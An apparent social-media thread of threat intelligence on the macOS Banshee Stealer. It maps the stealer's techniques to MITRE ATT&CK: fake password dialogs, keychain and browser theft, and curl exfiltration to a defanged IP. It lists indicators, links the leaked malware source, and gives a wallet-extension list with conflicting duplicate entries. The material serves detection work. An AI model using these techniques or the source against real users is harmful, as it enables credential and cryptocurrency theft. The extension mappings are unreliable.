Banshee Stealer parvient à contourner l'XProtect d'Apple
https://www.lemondeinformatique.fr/actualites/lire-banshee-stealer-parvient-a-contourner-l-xprotect-d-apple-95773.html
#Infosec #Security #Cybersecurity #CeptBiro #BansheeStealer #XProtect #Apple
Critical Warning For 100 Million #Apple Users—New Hack Attack Confirmed #BansheeStealer #malware #Cybersecurity #MacOs
@PwnieFan Thanks for the share, this is great. #BANSHEEStealer recently had its source code posted to VXUG and exhibits the following MITRE ATT&CK aligned TTPs based on my source code analysis. Its a really good opportunity for orgs to get some foundational macOS stealer detections in place since these TTPs will likely get recycled into other stealer strains.
Execution
Command and Scripting Interpreter: AppleScript (T1059.002): Banshee Stealer executes the vast majority of its commands via AppleScript osascript command line invocation.
User Execution: Malicious File (T1204.002): Banshee Stealer relies on the end user to execute the malicious payload.
Defense Evasion
Virtualization/Sandbox Evasion: System Checks (T1497.001): Banshee Stealer will perform a series of rudimentary debugger and virtual machine checks.
Debugger Evasion (T1622): Banshee Stealer checks for a debugger by examining the status of the system P_TRACED flag.
Abuse Elevation Control Mechanism: TCC Manipulation (T1548.006): Banshee Stealer resets the TCC settings for AppleEvents via the native macOS binary tccutil.
Credential Access
Input Capture: GUI Input Capture (T1056.002): Banshee Stealer generates a dialog box via osascript to prompt the user for their credentials and will validate them using the native Apple binary dscl.
Credentials from Password Stores: Keychain: (T1555.001): Banshee Stealer attempts to copy the user’s macOS keychain file from /Library/Keychains/login.keychain-db to /Users/<username>/password-entered.
Credentials from Password Stores: Credentials from Web Browsers (T1555.003): Banshee Stealer attempts to copy the user’s web browser information to include browser history, cookies, and logins from Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari.
Steal Web Session Cookie (T1539): Banshee Stealer attempts to copy the user’s web browser information to include browser history, cookies, and logins from Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, OperaGX, and Safari.
Unsecured Credentials: Credentials in Files (T1552.001): Banshee Stealer attempts to copy the macOS Notes SQLite database along with a number of other file types from common locations on the host to include the Desktop and Documents folders.
Discovery
System Information Discovery (T1082): Banshee Stealer profiles the host to detect for the presence of virtualization using the built-in macOS binary system_profiler.
System Location Discovery: System Language Discovery (T1614.001): Banshee Stealer checks the host’s language locale setting via _CFLocaleCopyPreferredLanguages for whether it is set to ‘RU’.
System Network Configuration Discovery: Internet Connection Discovery (T1016.001): Banshee Stealer queries hxxps://freeipapi[.]com/api/json/ or hxxps://api.ipify[.]org/?format=json via HTTP curl request to ensure internet connectivity and to gather the victim’s public IP address.
Collection
Archive Collected Data: Archive via Utility (T1560.001): Banshee Stealer calls native macOS binary ditto to generate a ZIP archive for eventual exfiltration.
Data Staged: Local Data Staging (T1074.001): Banshee Stealer will create new folders called ‘FileGrabber’, ‘Notes’, /tmp/tempAppleScript, <temporary_path>/Passwords, <temporary_path>/Browsers, <temporary_path>/Wallets, and /Users/<username>/password-entered to store stolen credentials and other files of interest prior to exfiltration.
Command and Control
Data Encoding: Standard Encoding (T1132.001): Banshee Stealer base64-encodes the stolen data within the ZIP archive prior to exfiltration.
Encrypted Channel: Symmetric Cryptography (T1573.001): Banshee Stealer employs XOR encryption against the ZIP archive prior to base64-encoding the results and exfiltrating the data.
Exfiltration
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): Banshee Stealer exfiltrates the stolen data via a curl POST command to hxxp://45.142.122[.]92/send/.
Impact
Financial Theft (T1657): Banshee Stealer will gather and steal various files from a macOS victim host to include cryptocurrency wallets, login keychains, browser cookies, and browser extension information.
Indicators of Compromise
HTTP URLs for Public IP Address Collection/Internet Checks:
hxxps://freeipapi[.]com/api/json/
hxxps://api.ipify[.]org/?format=json
HTTP URL for Exfiltration: hxxp://45.142.122[.]92/send/
Exfiltration IP Address: 45.142.122[.]92
Network: 45.142.122.0/24
Autonomous System Number: 216246
Autonomous System Label: Aeza Group Ltd.
Regional Internet Registry: RIPE NCC
Country: RU
TARGETED BROWSER EXTENSIONS
nkbihfbeogaeaoehlefnkodbefgpgknn == MetaMask Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad == Coinbase Wallet
egjidjbpglichdcondbcbdnbeeppgdph == Trust Wallet
fdjamakpfbbddfjaooikfcpapjohcfmg == Dashlane Password Manager
bfnaelmomeimhlpmgjnjophhpkkoljpa == Phantom Wallet
inogffkifehjmjkojolhagpbmdjajfjf == ???
afbcbjpbpfadlkmhmclhkeeodmamcflc == Math Wallet
aeachknmefphepccionboohckonoeemg == Coin98 Wallet
dnahimkjmphecfmphdplpidnpdbgihjm == ???
fhbohimaelbohpjbbldcngcnapndodjp == Binance Wallet
hpglfhgfnhbgpjdenjgmdgoeiappafln == ???
ddjbpkjkbihpkkjoiidijondfnnilgbd == ???
ljfoeinjpaedjfecbmggjgodbgkmjkjk == Trezor Wallet
fhbohimaelbohpjbbldcngcnapndodjp == Sollet Wallet
agofbccfdbggmjhbjligajffaedmpfi == BitKeep
oblahjcienboiocobpfmpkhgbilacbof == MyEtherWallet (MEW)
dmkamcknogkgcdfhhbddcghachkejeap == Keplr Wallet
eogjbkambcobpejogjednkhnkdlpjkgf == ZenGo Wallet
ffnbelfdoeiohenkjibnmadjiehjhajb == FoxWallet
nkpfkohfaabomajpmcikkgipnddjbjlm == XDEFI Wallet
cjfkaebgdjmgkknhmeddmbjfkkllcfma == Rabby Wallet
cgjclchllmlobfdhpdfbfblakllcdcp == SafePal Wallet
cgpbghdcejifbdmicolodockpdpejkm == D'CENT Wallet
ekpbnlianmehonjglfliphieffnpagjk == Portis
bhemafnepdahjhdibdejjdojplpanpjm == Clover Wallet
eobpgiikknjeagdbnljopepfkfgjcom == Talisman Wallet
cefoeaflfeaogknfendclmchngnpadh == MathWallet (duplicate corrected)
cegnkklhnkfhpgpgdddpbglgbfjcbka == Cyano Wallet
mfibgodchngikcneecnpcenooljdfcd == Opera Crypto Wallet
njehdbnfdjbclbggngdihjghpknebfn == Polkadot-JS
kgpidhfbnidjcldpngdonkekmpkgihke == Solflare Wallet
cegmkloiabeockglkffemjljgbbannn == Ellipal Wallet
kjklkfoolpolbnklekmicilkhigclekd == AlphaWallet
bnnkeaggkakalmkbfbcglpggdobgfoa == ZelCore
plnnhafklcflphmidggcldodbdennyg == AT.Wallet
hjbkalghaiemehgdhaommgaknjmbnmf == Loopring Wallet
dljopojhfmopnmnfocjmaiofbbifkbfb == Halo Wallet
pghngobfhkmclhfdbemffnbihphmpcgb == Pillar Wallet
keoamjnbgfgpkhbgmopocnkpnjkmjdd == Ambire Wallet
nhdllgjlkgfnoianfjnbmcjmhdelknbm == Blocto Wallet
fgdbiimlobodfabfjjnpefkafofcojmb == Hashpack Wallet
blpcdojejhnenclebgmmbokhnccefgjm == Defiat Wallet
kjbhfnmamllpocpbdlnpjihckcoidje == Opera Crypto
efnhgnhicmmnchpjldjminakkdnidbop == Titan Wallet
kmccchlcjdojdokecblnlaclhobaclj == ONE Wallet
bpcedbkgmedfpdpcabaghjbmhjoabgmh == MewCX
aipfkbcoemjllnfpblejkiaogfpocjba == Frontier Wallet
nmngfmokhjdbnmdlajibgniopjpckpo == ChainX Wallet
nehbcjigfgjgehlgimkfkknemhnhpjo == Bifrost Wallet
ejbalbakoplchlghecdalmeeeajnimhm == MetaMask
ofhbbkphhbklhfoeikjpcbhemlocgigb == Coinbase Wallet
lefigjhibehgfelfgnjcoodflmppomko == Trust Wallet
alncdjedloppbablonallfbkeiknmkdi == Crypto.com DeFi Wallet
bfnaelmomeimhlpmgjnjophhpkkoljpa == Phantom
lpbfigbdccgjhflmccincdaihkmjjfgo == Guarda Wallet
achbneipgfepkjolcccedghibeloocbg == MathWallet
fdgodijdfciiljpnipkplpiogcmlbmhk == Coin98
ljfoeinjpaedjfecbmggjgodbgkmjkjk == Nami Wallet
mcbpblocgmgfnpjjppndjkmgjaogfceg == Binance Wallet
geceibbmmkmkmkbojpegbfakenjfoenal == Exodus
ibnejdfjmmkpcnlpebklmnkoeoihofec == Atomic Wallet
ffnbelfdoeiohenkjibnmadjiehjhajb == Yoroi Wallet
kjebfhglflciofebmojinmlmibbmcmkdo == Trezor Wallet
jaoafjlleohakjimhphimldpcldhamjp == Sollet Wallet
blnieiiffboillknjnepogjhkgnoapac == BitKeep
odbfpeeihdkbihmopkbjmoonfanlbfcl == MyEtherWallet (MEW)
leibnlghpgpjigganjmbkhlmehlnaedn == Keplr Wallet
hmnminpbnkpndojhkipgkmokcocmgllb == ZenGo Wallet
bocpokimicclglpgehgiebilfpejmgjo == FoxWallet
ljfoeinjpaedjfecbmggjgodbgkmjkjk == XDEFI Wallet
ilajcdmbpocfmipjioonlmljbmljbfpj == Rabby Wallet
hnmpcagpplmpfojmgmnngilcnanddlhb == SafePal Wallet
odbfpeeihdkbihmopkbjmoonfanlbfcl == D'CENT Wallet
ahkfhobdidabdlaphghgikhlpdbnodpa == Portis
jihneinfbfkaopkpnifgbfdlfpnhgnko == Clover Wallet
hpglfhgfnhbgpjdenjgmdgoeiappafln == Talisman Wallet
cmeakgjggjdhccnmkgpjdnaefojkbgmb == MathWallet (duplicate corrected)
ffabmkklhbepgcgfonabamgnjfjdbjoo == Cyano Wallet
cdjkjpfjcofdjfbdojhdmlflffdafngk == Opera Crypto Wallet
apicngpmdlmkkjfbmdhpjedieibfklkf == Polkadot-JS
lhkfcaflljdcedlgkgecfpfopgebhgmb == Solflare Wallet
omgopbgchjlaimceodkldgajioeebhab == Ellipal Wallet
kehbljcfpanhajpidcmblpdnlphelaie == AlphaWallet
lnehnlppemineeojdjkcpgoockkboohn == ZelCore
kjebfhglflciofebmojinmlmibbmcmkdo == AT.Wallet
hjebgbdpfgbcjdopfbbcpcjefcmhpdpn == Loopring Wallet
pklfcgcfchhcokldoonkijijfpgmjilh == Halo Wallet
lplmibmljignbdmkclofcackoolcfnhj == Pillar Wallet
kibokekadkmfjfckkbgndphcjejhoial == Ambire Wallet
nhdllgjlkgfnoianfjnbmcjmhdelknbm == Blocto Wallet
kdfmmohbkjggjlmelhhmcgohadhdeijn == Hashpack Wallet
blpcdojejhnenclebgmmbokhnccefgjm == Defiat Wallet
kjbhfnmamllpocpbdlnpjihckcoidje == Opera Crypto
aoilkoeledabkfogmczlbdfhbdkoggko == Titan Wallet
jmchmkecamhbiokiopfpjjmfkpbbjjaf == ONE Wallet
mgffkfbidcmcenlkgaebhoojfcegdndl == MewCX
kdgecbhaddlgffpdffafpikmjekjflff == Frontier Wallet
pfilbfecknpnlbcioakkpcmkfckpogeg == ChainX Wallet
mehhoobkfknjlamaohobkhfnoheajlfi == Bifrost Wallet
Blue Team Win: Network defenders should take some time to review the Banshee Stealer source code hosted by VX Underground on their GitHub page. Even if you have no RE experience, its one or the most straightforward and easy-to-analyze malware samples I've ever seen. It's also a great learning opportunity for budding malware REs looking to learn about macOS malware and common stealer TTPs.
The Banshee Stealer TTPs mainly consist of living-off-the-land macOS system binaries (ditto, dscl, system_profiler, curl, tccutil, osascript) and present a unique detection opportunity for security teams, especially those with weak or non-existent macOS signatures. While multiple media outlets are saying the malware operation has shut down, I fully expect skids to compile the Banshee Stealer malware verbatim or fork it into a new family. As a result, expect many of the TTPs to be recycled, reinforcing the need for security teams to take a peek under the hood and get some easy macOS detection wins.
I've identified a few preliminary key findings based on my own source code analysis:
*Banshee Stealer is a fully functional macOS-based information stealer which presents itself as a viable cybersecurity threat to the macOS ecosystem.
*Banshee Stealer targets a wide range of macOS browsers, cryptocurrency wallets, file extension types, and browser extensions, making it a highly versatile and dangerous threat to macOS users.
*Banshee Stealer attempts to steal the user’s primary macOS user credentials along with the critical macOS keychain DB file.
*Banshee Stealer employs many native ‘living-off-the-land’ macOS binaries such as ditto, dscl, curl, system_profiler, tccutil, and osascript to action on its objectives. Most security toolsets will not fire for their execution.
*Banshee Stealer employs rudimentary anti-VM/debugger detection mechanisms such as system hardware and software checks along with locale language detection for the RU language code.
*System checks for the Russian language code have historically indicated the malware was intended to avoid infecting victims based out of Russia or the Commonwealth of Independent States (CIS).
Source Code:
https://github.com/vxunderground/MalwareSourceCode/blob/main/MacOS/MacOS.Stealer.Banshee.7z
Elastic Security Labs ha descubierto un nuevo malware dirigido a macOS llamado Banshee Stealer.
Marc Rivero
Rene Robichaud
Mikasa4231
The Threat Codex
Tarnkappe.info
Saltmyhash
mecambioaMac 
Marcel SIneM(S)US